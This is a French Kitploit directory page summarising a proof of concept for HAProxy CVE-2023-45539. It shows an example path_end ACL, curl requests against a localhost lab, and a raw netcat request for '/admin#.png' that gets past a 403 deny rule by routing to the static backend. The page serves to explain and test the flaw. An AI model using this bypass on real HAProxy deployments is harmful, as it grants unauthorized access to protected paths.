Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
HAProxy-CVE-2023-45539-PoC — HAProxy-CVE-2023-45539-PoC | Kitploit
Outils/GitHubGitHub/slicingmelon/haproxy-cve-2023-45539-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionMauvaise Configuration
GitHubslicingmelon/haproxy-cve-2023-45539-poc

HAProxy-CVE-2023-45539-PoC

HAProxy-CVE-2023-45539-PoC

Voir le dépôt
3il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

HAProxy-CVE-2023-45539-PoC

HAProxy avant 2.8.2 accepte # comme faisant partie du composant URI, ce qui pourrait permettre à des attaquants distants d'obtenir des informations sensibles ou d'avoir un autre impact non spécifié en cas de mauvaise interprétation d'une règle path_end, comme le routage de index.html#.png vers un serveur statique.

Ce qui est mal routé dans cette CVE n'est pas une extension que l'application backend « prend en charge » — ce sont uniquement celles que HAProxy lui-même est configuré pour router à l'aide des ACLs path_end (ou regex).

root@kitploit:~
acl is_static path_end .png .jpg .gif .css .js
use_backend be_static if is_static

Cela signifie :

HAProxy ne se soucie pas de savoir si le backend peut réellement servir .png, .js, etc.

Il ne regarde que la correspondance du suffixe dans le chemin de la requête.

Si le suffixe correspond à l'une de ces chaînes, il route vers be_static.

Donc :

/admin#.png → correspond à .png → va vers be_static → contournement

/admin#.asc → ne correspond pas → reste dans be_app → déclenche deny → 403

root@kitploit:~
curl -i http://localhost:6655/public                                               
HTTP/1.1 200 OK
content-length: 7
content-type: text/plain

APP OK
root@kitploit:~
curl -i http://localhost:6655/admin 
HTTP/1.1 403 Forbidden
content-length: 93
cache-control: no-cache
content-type: text/html

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>

Contournement

root@kitploit:~
printf 'GET /admin#.png HTTP/1.1\r\nHost: localhost\r\n\r\n' | nc -q1 127.0.0.1 6655
HTTP/1.1 200 OK
content-length: 31
content-type: text/plain

STATIC OK (routed by path_end)
Télécharger l’outil